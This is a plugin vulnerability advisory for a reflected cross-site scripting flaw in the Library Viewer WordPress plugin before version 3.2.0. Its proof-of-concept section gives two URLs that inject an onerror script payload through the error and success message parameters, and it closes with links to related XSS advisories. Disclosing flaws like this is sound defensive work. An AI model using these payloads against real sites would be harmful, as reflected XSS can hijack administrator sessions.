Library Viewer < 3.2.0 – Reflected Cross-Site Scripting | CVE 2025-15396 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

Proof of Concept

1. In your site root, add the directory "library" so it is accessible at https://example.com/library
2. Add a page with the shortcode "[library-viewer]"
3. Access one of the following URLs to see the XSS:

http://example.com/page-with-shortcode/?library-viewer-error-message=<img src=x onerror=alert(1)>

http://example.com/page-with-shortcode/?library-viewer-success-message=<img src=x onerror=alert(1)>

Affects Plugins

Fixed in 3.2.0

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Muhammad Rohan khan

Submitter

Muhammad Rohan khan

Verified

Yes

WPVDB ID

08790e11-019d-4680-a75f-ee0a937f8cc8

Timeline

Publicly Published

2026-01-12 (about 21 days ago)

Added

2026-01-12 (about 21 days ago)

Last Updated

2026-01-12 (about 21 days ago)

Other

Published

Title

Published

2023-05-30

Title

Call Now Icon Animate <= 0.1.0 - Admin+ Stored XSS

Published

2022-07-04

Title

Ivory Search < 5.4.7 - Reflected Cross-Site Scripting

Published

2022-10-06

Title

WP Word Count < 3.2.4 - Admin+ Stored Cross-Site Scripting

Published

2014-08-01

Title

Wise Search Widget 1.1 - s Parameter Reflected XSS

Published

2023-05-19

Title

Groundhogg < 2.7.10 - Contributor+ Stored XSS